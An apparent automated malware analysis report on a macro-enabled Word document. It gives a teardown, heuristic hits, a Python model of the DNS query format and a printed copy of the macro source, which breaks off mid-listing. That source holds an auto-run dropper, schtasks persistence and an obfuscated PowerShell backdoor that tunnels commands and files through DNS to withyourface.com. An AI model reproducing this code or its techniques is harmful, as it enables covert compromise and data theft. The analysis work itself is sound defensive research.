Verdict: MALICIOUS
Risk Score: 410
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1204.002 User Execution: Malicious File
The sample contains a Document_Open VBA macro in ThisDocument that runs three subroutines when the document is opened. VVVV creates the working directory C:\ProgramData\WindowsAppPool. AAAA assembles a VBScript dropper as a string, writes it to C:\ProgramData\WindowsAppPool\AppPool.vbs, calls HGHG, and then launches the dropper with 'wscript C:\ProgramData\WindowsAppPool\AppPool.vbs' through Shell. The strings 'powershell.exe', 'cmd.exe' and 'wscript' are spelled as Chr(CLng("&Hxx")) chains so they never appear literally in the macro. The dropped VBScript uses WScript.Shell: if the marker file C:\ProgramData\WindowsAppPool\quid already exists it runs 'powershell.exe -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1' with a hidden window; otherwise it first registers the scheduled task \WindowsAppPool\AppPool via 'cmd.exe /C schtasks /create /F /sc minute /mo 1 ... /tr wscript /b C:\ProgramData\WindowsAppPool\AppPool.vbs', which re-runs the dropper every minute (persistence), and then starts the PowerShell stage.

HGHG writes that stage to C:\ProgramData\WindowsAppPool\AppPool.ps1 as a single-quoted, '+'-split string in which the tokens Mxa, SGF, X9P, 7rn, ZxV and VOl stand for \, $, ", |, ' and `; a trailing -creplace/-replace chain restores them and the result is piped to &($ShellId[1]+$ShellId[13]+'X'), i.e. ieX (Invoke-Expression). Deobfuscated, AppPool.ps1 is a DNS-tunnelling backdoor. It keeps a 10-character host ID in 'quid' and its PID in 'lock' (exiting if another instance holds the lock, and killing that instance if the lock is older than 10 minutes), creates receivebox, sendbox and done directories under C:\ProgramData\WindowsAppPool\<ID>, and talks to withyourface.com by hand-building DNS queries that it sends over UDP/53 directly to the address the domain resolves to; the leftmost labels carry the ID, counters and random hex. Commands and files arrive either in the octets of A-record answers or as base64 in TXT answers and are written to receivebox. A received file whose name ends in 0 is executed line by line through cmd.exe, one ending in 1 names a local file to upload, and the results are placed in sendbox, hex-encoded and sent back in 60-character chunks as further lookups. The scheduled task repeats the whole cycle every minute.
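The PowerShell stage that HGHG writes to AppPool.ps1 (see the preview script below, once the token substitution is undone) does not use the system resolver for its data channel. In its functions GGD and IID it opens a UdpClient to the address withyourface.com resolves to, port 53, hand-builds a DNS query (a fixed 12-byte header, the hostname with every dot overwritten by the length of the following label, then QTYPE and QCLASS) and, instead of parsing the reply, copies everything after a fixed offset (QNAME length + 29 for TXT, + 28 for A) as payload. The following Python model is an added example for this report, not code from the sample or from the analyzer: it reproduces the query exactly as the script builds it, parses it the way a network sensor would, and constructs a minimal reply to show why those two fixed offsets land exactly on the answer's RDATA. The hostname and reply contents are constructed for the example.

```python
"""Model of the hand-rolled DNS transport in AppPool.ps1 (GGD/IID after deobfuscation).

Added example for this report, not code from the sample. The query layout is taken from
the script; the server reply is CONSTRUCTED here to show why the script's fixed skips
(+29 for TXT, +28 for A) land exactly on the answer's RDATA.
"""
import struct

# The 12 header bytes the script hardcodes: ID 0xa4a3, flags 0x0100 (RD), QDCOUNT 1, AN/NS/AR 0.
DNS_HEADER = bytes([0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
QTYPE_A, QTYPE_TXT = 0x0001, 0x0010
QCLASS_IN = 0x0001


def encode_qname(name: str) -> bytes:
    """The script's trick: wrap the name in dots, then overwrite every dot with the length
    of the label that follows it. The trailing dot becomes the 0x00 root terminator."""
    if not name.startswith("."):
        name = "." + name
    if not name.endswith("."):
        name += "."
    buf = bytearray(name.encode("ascii"))
    labels = name.split(".")
    nxt = 1
    for i, byte in enumerate(buf):
        if byte == 0x2E:
            buf[i] = len(labels[nxt])
            nxt += 1
    return bytes(buf)


def build_query(name: str, qtype: int) -> bytes:
    """Header + QNAME + QTYPE + QCLASS: exactly what $s.Send() puts on UDP/53."""
    return DNS_HEADER + encode_qname(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    """Generic parser (what a sensor sees): transaction id, flags, qdcount, qname, qtype."""
    txid, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    off, labels = 12, []
    while pkt[off] != 0:
        ln = pkt[off]
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    qtype, _qclass = struct.unpack(">HH", pkt[off + 1:off + 5])
    return {"id": txid, "flags": flags, "qdcount": qdcount,
            "qname": ".".join(labels), "qtype": qtype}


def build_response(query: bytes, rdata: bytes) -> bytes:
    """CONSTRUCTED reply: echo the question, answer with a compression pointer (0xC00C)."""
    qtype = struct.unpack(">H", query[-4:-2])[0]
    header = query[:2] + b"\x81\x80" + struct.pack(">HHHH", 1, 1, 0, 0)
    if qtype == QTYPE_TXT:
        rdata = bytes([len(rdata)]) + rdata   # TXT RDATA is a length-prefixed <character-string>
    answer = b"\xc0\x0c" + struct.pack(">HHIH", qtype, QCLASS_IN, 60, len(rdata)) + rdata
    return header + query[12:] + answer


def rdata_offset(name: str, qtype: int) -> int:
    """Where the script starts copying: 12 header + QNAME + 4 question (the echoed question),
    then 2 pointer + 2 type + 2 class + 4 TTL + 2 RDLENGTH = 12, plus the 1-byte TXT length.
    That is len(QNAME) + 29 for TXT and len(QNAME) + 28 for A, the constants in the script."""
    return len(encode_qname(name)) + 16 + 12 + (1 if qtype == QTYPE_TXT else 0)


def extract_payload(response: bytes, name: str, qtype: int) -> bytes:
    """Mirror of the script's [System.Buffer]::BlockCopy: no parsing, a fixed skip, rest is data."""
    return response[rdata_offset(name, qtype):]


if __name__ == "__main__":
    host = "00a1b2c3C04T.withyourface.com"   # label shape is illustrative, not a real beacon
    q = build_query(host, QTYPE_TXT)
    r = build_response(q, b"S000s>Zm9v")    # constructed: the receiver splits TXT replies on '>'
    print(parse_query(q))
    print(extract_payload(r, host, QTYPE_TXT))
```

Because the receiver skips a fixed number of bytes, it only works against a server that answers with exactly one record and a compression pointer for the owner name; a resolver in the path that rewrites the answer breaks the channel, which is consistent with the script sending straight to the resolved address of withyourface.com rather than to the configured DNS server. For detection, the traffic is a stream of A and TXT lookups from one client against one domain with long, random-looking leftmost labels, which a DNS sensor can count per source.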
Heuristics (11)

- ClamAV: Win.Trojan.Bondupdater-6751535-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Bondupdater-6751535-0
- VBA macros detected [medium] (OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    Call HGHG
    Call Shell(Chr(CLng("&H77")) & Chr(CLng("&H73")) & Chr(CLng("&H63")) & Chr(CLng("&H72")) & Chr(CLng("&H69")) & Chr(CLng("&H70")) & Chr(CLng("&H74")) & Chr(CLng("&H20")) & "C:\ProgramData\WindowsAppPool\AppPool.vbs", vbNormalFocus)
    End Sub
  (the Chr(CLng("&H..")) chain decodes to "wscript ", so this launches the dropped AppPool.vbs)
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
    Dim A As String
    A = "DIM fso " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & " Shell0.run """
    A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
  (the second chain decodes to "powershell.exe"; the text assigned to A is the VBScript dropper, not VBA that runs in Word)
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: the same two lines as OLE_VBA_WSCRIPT above (the dropper text creates Scripting.FileSystemObject and wscript.shell)
- cmd.exe reference in VBA [high] (OLE_VBA_CMD): cmd.exe reference in VBA. Matched lines in script (three truncated `sss = sss + ...` statements from Sub HGHG; the full statements in the preview below pipe received command lines through cmd.exe):
    sss = sss + " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function slab'+'er (SGFVVE) {" & vbCrLf & " SGFf = gc SGFVVE -Encoding Byte;" & vbCrLf & " SGFe = resolver(SGFf);" & vbCrLf & " retur'+'n SGFe;" & vbCrLf & "}" & vbCrLf & "function resolver (SGFWWE) {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFp1 = X9PX9P;" & vbCrLf & " SGFp2'+' = X9PX9P;" & vbCrLf & " for (SGFi = 0; SGFi -lt SGFWWE.Length; SGFi++)" & vbCrLf & " {" & vbCrLf & " if (SGFcnt -eq 30)" & vb …
    sss = sss + " SGFFFE = @(gci -path (SGF{global:SGFNND}+X9PMxarcvd'+'*X9P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " S'+'GFIIE = SG'+'FFFE[0].ToStri'+'ng()'+'.Replace(X9PrcvdX9P, X9PprocX9P)" & vbCrLf & " rni SGFFFE[0] SGFIIE -Force" & vbCrLf & " '+' SGFYYE = SGFIIE'+' -replace X9PreceiveboxX9P, X9PsendboxX9P;" & vbCrLf & " i'+'f (SGFIIE.EndsWith(X9P0X9P))" & vbCrLf & " {" & vbCrLf & " SGFZZE = gc SGFIIE 7rn'+' ? { SGF_.t'+'rim() …
    sss = sss + " SGFBBF = gc SGFIIE 7rn ? { SGF_.'+'trim() -ne X9PX9P } 7rn %{ SGF_.Replace(X9PVOl0X9P, X9PX9P).Trim() }" & vbCrLf & " if (Test-path -path SGFBBF)" & vbCrLf & " {" & vbCrLf & " cpi -path SGFBBF -destination SGFYYE -Force;" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " X9PFile not existX9P 7rn sc SGFYYE;" & vbCrLf & " }" & vbCrLf & " if (Test-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " …
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] (OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Call VVVV
- Reference to Windows Script Host [high] (SC_STR_WSCRIPT): Reference to Windows Script Host
- Suspicious extracted artifact [high] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard Office DrawingML schema namespace and carries no indicator value on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24094 bytes | 9ef4547c36bfb3d95234f4e8ba8bc1f3c486028eedd33470c1a2aca0ff932350 |

Detection (macros.bas):
- ClamAV: No threats found (the Win.Trojan.Bondupdater signature above fired on the parent document, not on the decoded macro text)
- Obfuscation or payload: likely. 97 of 263 identifiers look randomly generated (e.g. 'X9PMxasendboxX9P') and there are 3 string-concatenation chains, consistent with name-mangling obfuscation. The "random" identifiers are the X9P/Mxa/SGF placeholder tokens of the embedded PowerShell; 'X9PMxasendboxX9P' is "\sendbox" once the substitutions at the end of the script are applied.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Call VVVV
Call AAAA
End Sub
Sub AAAA()
Dim A As String
A = "DIM fso " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & " Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "Else" & vbCrLf & "Shell0.run """ & Chr(CLng("&H63")) & Chr(CLng("&H6D")) & Chr(CLng("&H64")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " /C schtasks /create /F /sc minute /mo 1 /tn """"\WindowsAppPool\AppPool"""" /tr """"wscript /b """"C:\ProgramData\WindowsAppPool\AppPool.vbs"""""""""", 0,false" & vbCrLf & "Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "End If" & vbCrLf & "Wscript.Quit(intOK)"
Open "C:\ProgramData\WindowsAppPool\AppPool.vbs" For Output As #1
Print #1, A
Close #1
Call HGHG
Call Shell(Chr(CLng("&H77")) & Chr(CLng("&H73")) & Chr(CLng("&H63")) & Chr(CLng("&H72")) & Chr(CLng("&H69")) & Chr(CLng("&H70")) & Chr(CLng("&H74")) & Chr(CLng("&H20")) & "C:\ProgramData\WindowsAppPool\AppPool.vbs", vbNormalFocus)
End Sub
Sub VVVV()
Dim fdObj As Object
Application.ScreenUpdating = False
Set fdObj = CreateObject("Scripting.FileSystemObject")
If fdObj.FolderExists("C:\ProgramData\WindowsAppPool") Then
Else
fdObj.CreateFolder ("C:\ProgramData\WindowsAppPool")
End If
Application.ScreenUpdating = True
End Sub
Sub HGHG()
Dim sss As String
sss = sss + "(('SGFMMC = '+'X9Pwithyourface.comX9P;" & vbCrLf & "SGFNNC = X9PC:MxaProgramDataMxaWindowsAppPoolX9P;'+'" & vbCrLf & "if (-not (Te'+'st-Path SGFNNC))'+' { md SGFN'+'NC; }" & vbCrLf & "SGFOOC = SGFNNC'+' + X9PMxaquidX9P;" & vbCrLf & "SGFPPC = SGFNNC + X9PMxalockX9P;" & vbCrLf & "'+'if (!(Test-Path SGFPPC)){sc -P'+'ath SGFPPC -Value SGFpid;}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & " SGFQQC = (NEW-TI'+'MESPA'+'N -Start ((Get-C'+'hildItem SGFPPC).CreationTime) -End (Get-Date)).Minute'+'s" & vbCrLf & " if (SGFQQC -gt 10)" & vbCrLf & " {" & vbCrLf & " stop-proces'+'s -'+'i'+'d (gc SGFPPC);" & vbCrLf & " ri '+'-Path SGFPPC;" & vbCrLf & " }" & vbCrLf & " return;" & vbCrLf & "}'+'" & vbCrLf & "SGFRRC ='+' get-content SGFOOC;" & vbCrLf & "SGFS'+'SC = Get-Random -InputObject (10 .. 99);" & vbCrLf
sss = sss + "if (SGFRRC.length -ne 10) { SGFRRC = SGFSSC.ToString() + [guid]::NewGuid().toString().replace(ZxV-ZxV, ZxVZxV).substring(0, 8); SGFRRC 7r'+'n sc SG'+'FOOC }" & vbCrLf & "gi SGFOOC -Force 7rn %{ SGF_.Attributes = X9PHiddenX9P }" & vbCrLf & "SGF{global:SGFTTC} = 0;" & vbCrLf & "'+'" & vbCrLf & "function UUC (SGFVVC, SGFWWC, SGFXXC, SGFYY'+'C, SGFZZC, SGFAAD)" & vbCrLf & "{" & vbCrLf & " SGFBBD = -joi'+'n ((48 .. 57)+(65 .. 70) 7rn Get-Random -Count (%{ Get-Random -Inp'+'ut'+'Object (1 .. 7) }) 7rn %{ [char]SGF_ });" & vbCrLf & " SGFCCD = Get-Random -InputObject (0 .. 9) -Count 2;" & vbCrLf & " SGFDDD = SGFRRC.Insert((SGFCCD['+'1]), SGFWWC).Insert(SGFCCD[0], SGFVVC);" & vbCrLf & " if (SGFZZC -eq X9PsX9P)" & vbCrLf & " { return X9PSGF(SGFDDD)SG'+'F(SGFAAD)'+'SGF(SGFBBD)CSGF(SGFCCD[0])SGF(SGFCCD[1])T.SGFXXC.SGFYYC.SGFMMCX9P; }" & vbCrLf & " else " & vbCrLf & " { return X9PSGF(SGFDDD)SGF'+'(SGFAAD)SGF(SGFBBD)CSGF(SGFC'+'CD[0])SGF(SGFCCD[1])T.SGF(SGFMMC)X9P;}" & vbCrLf
sss = sss + "}" & vbCrLf & "fu'+'nction EED()" & vbCrLf & "{" & vbCrLf & " SGFFFD = SGFnull;" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " SGFFFD = ((Get-'+'WmiObject Win32_Networ'+'kAdapterConfig'+'uration -ComputerName SGFen'+'v:computername -E'+'A Stop 7rn ? { SGF_.IPEnabled }).DNSServerSearchOrder)[0] 7rn Out-String" & vbCrLf & " }" & vbCrLf & " catch [exception] {" & vbCrLf & " #Write-Host SGF_.Message" & vbCrLf & " }" & vbCrLf & " if (!SGFFFD)" & vbCrLf & " {" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " SGFns = nslook'+'up.exe 8.8.8.8;" & vbCrLf & " SGFFFD = (SGFns[1] -split ZxV:ZxV)[1].Trim();" & vbCrLf & " }" & vbCrLf & " catch [exception] {" & vbCrLf & " #Write-Host SGF_.Message" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " re'+'turn SGFFFD" & vbCrLf & "}" & vbCrLf & "function GGD (SGFHHD'+')" & vbCrLf & "{" & vbCrLf & " SGFip = EED" & vbCrLf & " SGFars = ['+'system.net.IPAddress]::Parse([System.Net.Dns]::GetHostAddresses(SGFMMC));" & vbCrLf
sss = sss + " SGFend = New-Object System.Net.IPEndPoint SGFars, 53" & vbCrLf & " SGFs = Ne'+'w-Object System.Net.Sock'+'ets.UdpClient" & vbCrLf & " SGFs.Client.Rece'+'iveTimeout = SGFs.Client.SendTimeout = 1500'+'0" & vbCrLf & " SGFs.Connect(SGFend)" & vbCrLf & " SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0'+'x00, 0x00)" & vbCrLf & " if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + '+'SGFHHD; }" & vbCrLf & " if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD'+' = SGFHHD + X9P.X9P; }" & vbCrLf & " SGFmb = [System'+'.Text.Encoding]::ASCII.GetBytes(SGFHHD)" & vbCrLf & " SGFp = SGFHHD.Split(ZxV.ZxV)" & vbCrLf & " SGFpi = 1" & vbCrLf & " '+'for (SGFi = 0; SGFi -lt SGFmb.length; SGFi++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGF'+'i] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & " SGFpre'+' += SGFmb" & vbCrLf & " SGFpre += (0x00, 0x10, 0x00, 0x01)" & vbCrLf & " SGFbuf = SGFpr'+'e" & vbCrLf & " SGFSent = SG'+'Fs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf
sss = sss + " SGFrb = SGFs.Receive([re'+'f]SGFend)" & vbCrLf & " SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.length + 29)))" & vbCrLf & " [System.Buffer]::Bl'+'ockCopy(SGFrb, SGFmb.length + 29, SGFr,'+' 0, (SGFrb.length - (SGFmb.length + 29))'+')" & vbCrLf & " return SGFr'+'" & vbCrLf & "}" & vbCrLf & "function '+'IID (SGFHHD)" & vbCrLf & "{" & vbCrLf & " SGFip = EED" & vbCrLf & " SGFars = [system.net.IPAddress]::Parse([System.Net.Dns]::Get'+'HostAddresses(SGFMMC)'+');" & vbCrLf & " SGFend = New-Object Syste'+'m.Net.I'+'PEnd'+'Point SGFars, 53" & vbCrLf & " SGFs = New-Object System.Net.Sockets.UdpClient" & vbCrLf & " SGFs.Client.ReceiveTimeo'+'ut = SGFs.Client.SendTimeout = 15000" & vbCrLf & " SGFs.Connect(SGFend)" & vbCrLf & " SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)" & vbCrLf & " if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + SGFHHD; }" & vbCrLf & " if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD = SGF'+'HHD + X9P.X9P; }" & vbCrLf
sss = sss + " SGFmb = [System.Text.Encoding]::ASCII.GetBytes(SGFHH'+'D)" & vbCrLf & " SGFp = SG'+'FHHD.Split(ZxV.ZxV)" & vbCrLf & " SGFpi = 1" & vbCrLf & " for'+' (SGFi = 0; SGFi -lt SGFmb.length; SGFi'+'++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGFi] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & " SGFpre += SGFmb" & vbCrLf & " SGFpre += (0x00, 0x01, 0x00, 0x01)" & vbCrLf & " SGFbuf = SGFpre" & vbCrLf & " SGFSent = SGFs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf & " SGFrb = SGFs.Receive([ref]SGFend)" & vbCrLf & " SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.lengt'+'h + 28)))" & vbCrLf & " [System.Buffer]::BlockCopy(SGFrb, SGFmb.len'+'gth + 28, SGFr'+', 0, (SGF'+'rb.length - (SGFmb.length + 28)))" & vbCrLf & " retu'+'rn SGFr" & vbCrLf & "}" & vbCrLf & "function JJD" & vbCrLf & "{" & vbCrLf & " SGFKKD = SGFfalse;" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGFMMD = SGF{glob'+'al:SGFNND}'+' + X9PMxaX9P;" & vbCrLf & " SGFOOD = @();" & vbCrLf & " SGFPPD = X9P000X9P;" & vbCrLf
sss = sss + " '+'SGFQQD = X9P0X9P;" & vbCrLf & " SGF{global:SGFRRD} = SGFtru'+'e;'+'" & vbCrLf & " SGF{global:SGFSSD} = 0;" & vbCrLf & " SGF{global:SGF'+'SGFTTD} = 5;'+'" & vbCrLf & " " & vbCrLf & " While (SGF{global:SGFRRD})" & vbCrLf & " {" & vbCrLf & " St'+'art-Sleep -m 50;" & vbCrLf & " if (SG'+'F'+'{global:SGFSSD} -gt SGF{global:SGFSGFTTD}) { break }" & vbCrLf & " if (SGFLLD -eq [int]SGFPPD) { SGF{global:SGFSSD}++ }" & vbCrLf & " if (SGFLLD -lt 10) '+'{ SGFPPD = X9P00SGF(SGFLLD)X9P; '+'}" & vbCrLf & " elseif (SGFLLD -lt 100) { SGFPPD = X9P0SGF(SGFLLD)X9P;'+' }" & vbCrLf & " else { SGFPPD = X9PSGF(SGFLLD)X9P; }" & vbCrLf & " SGFUUD = UUC SGFPPD SGFQQD '+'X9PX9P X9PX9P X9PrX9P" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " Write-Host SGF'+'UUD;" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & " Write-Host SGFVVD;" & vbCrLf & " '+' }" & vbCrLf & " catch [Except'+'ion]" & vbCrLf & " {" & vbCrLf
sss = sss + " echo SGF_.Exception.GetType().FullName, SGF_.Exception.Message; Write-Host X9Pexcepton occured!X9P; SGF{global:SGFSSD}++; continue;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFVVD -eq SGFnull)" & vbCrLf & " {" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & " continue;" & vbCrLf & " }" & vbCrLf & " SGFWWD = SGFVVD[0].IPAddressToString.Split(ZxV.ZxV);" & vbCrLf & " Write-Host X9PSGF(SGFLLD'+'):SGF(SGFW'+'WD[3])VOltsaveing_mode: S'+'GF(SGFKKD)VOl'+'t '+' S'+'GF(SGFWWD[0]) SGF(SGFWWD[1]) SGF'+'(SGFWWD[2])X9P" & vbCrLf & " if ((SGFWWD[0] -eq 1) -and (SGFWWD[1]'+' -eq 2) -and'+' (SGFWWD[2] -eq 3))" & vbCrLf & " {" & vbCrLf & " SGFKKD = SGFfalse;" & vbCrLf & " SGFQQD ='+' X9P0'+'X9P;" & vbCrLf & " SGFlen = SGFOOD.Length" & vbCrLf & " '+' if (SGFOOD[SGFlen - 1] -e'+'q 0 -and SGFOOD[SGF'+'len - 2] -eq 0)" & vbCrLf & " {" & vbCrLf & " SG'+'FXXD = SGFOOD[0 .. (SGFlen - 3)];" & vbCrLf & " }" & vbCrLf
sss = sss + " elsei'+'f (SGFOOD[SGFlen - 1] -eq 0)" & vbCrLf & " {" & vbCrLf & " SGFXXD = SGFOOD[0 .. (SGFlen - 2)];" & vbCrLf & " }" & vbCrLf & " e'+'lse" & vbCrLf & " {" & vbCrLf & "'+'" & vbCrLf & " SGFXXD = SGFOOD;" & vbCrLf & " }" & vbCrLf & " [System.IO.File]:'+':WriteAllBytes(SG'+'FMMD, SGFXXD);" & vbCrLf & " SGFOOD = @();" & vbCrLf & " SGFXXD = @();" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFKKD)" & vbCrLf & " {" & vbCrLf & " if (SGFLLD -gt 250) { SGFLLD = 0; }" & vbCrLf & " if (SGFLLD -eq SGFWWD[3]'+')" & vbCrLf & " {" & vbCrLf & " SGFOOD += SGFWWD[0];" & vbCrLf & " SG'+'FOOD += SGFWWD[1]'+';" & vbCrLf & " SGFOOD += SGFWWD'+'[2];" & vbCrLf & "'+' SGFLLD = SGFLLD + 3'+';" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if ((SGF'+'WWD[0] -eq 24) -and (SGF'+'WWD[1] -eq 125'+'))" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFMMD += X9PrcvdX9P + SGFWWD[2] + X9PX9P + SGFWWD[3];" & vbCrLf & " SGFKKD = SGFtrue;" & vbCrLf & " SGFQQD = X9P1X9P;" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " }" & vbCrLf & " '+' " & vbCrLf & " if ((SGFWWD[0] -eq 11) -and (SGFWWD[1] -eq 24) -and (SGFWWD[2] -eq 237)'+' -and (S'+'GFW'+'WD[3] -eq 110)) # kill '+'this process" & vbCrLf & " {" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " Start-Sleep -s 1;" & vbCrLf & "}" & vbCrLf & "function'+' YYD" & vbCrLf & "{" & vbCrLf & " SGFbyts = @(); SGFct = 0; SGFfb '+'= @(); SGFrn = X9P000X9P; SGFZZD = X9PWX'+'9P; SGFrun = SGFtrue; SGFAAE = SGF{global:SGFNND} + X9PMxaX9P;" & vbCrLf & " SGFBBE = 0;" & vbCrLf & " While (SGFrun)" & vbCrLf & " {" & vbCrLf & " Start-S'+'leep -m 50;" & vbCrLf & " if (SG'+'FBBE -gt 5){ SGFrun = SGFfalse;'+' }" & vbCrLf & " if'+' (SGFct -lt 10){SGFrn = X9P000SGF(SGFct)X9P;}" & vbCrLf
sss = sss + " elseif (SGFct -lt 100){SGFrn = X9P00SGF(SGFct)X9P;}" & vbCrLf & " elseif (SGFct -lt 1000){SGFrn = X'+'9P0SGF(SGFct)X9P;}" & vbCrLf & " els'+'e{SGFrn = X9PSGF(SGFct)X9P;}" & vbCrLf & "'+' try" & vbCrLf & "'+'" & vbCrLf & " {" & vbCrLf & " SGFCCE = UUC X9P000X9P '+'SGFZZ'+'D X9PX9P'+' X9PX9P '+'X9PrX9P SGFrn" & vbCrLf & " '+' SGFtmp = GGD(SGFCCE);" & vbCrLf & " SG'+'Fres = '+'[System.Text.Encodin'+'g]::'+'ASCII.GetString(SGFtmp);" & vbCrLf & " }" & vbCrLf & " catch [exception] { Write-Host SGF_; SGF'+'BBE++; SGF{glo'+'bal:SGFTTC}++; cont'+'inue; }" & vbCrLf & " if ([string]::IsNullOrEmpty(SGFres)) { SGFBBE++; SGF{global:SGFTTC}++; continue;}" & vbCrLf & " SGFrs = SGFres.Split(ZxV>ZxV);" & vbCrLf & " SGFdata = X9PX9P;" & vbCrLf & " For (SGFi = 0; SGFi -le SGFrs[1].Length; SGFi++) { if (SG'+'Frs[1][SGFi] -lt 125 -and SGFrs[1][SGFi] -gt 41) { 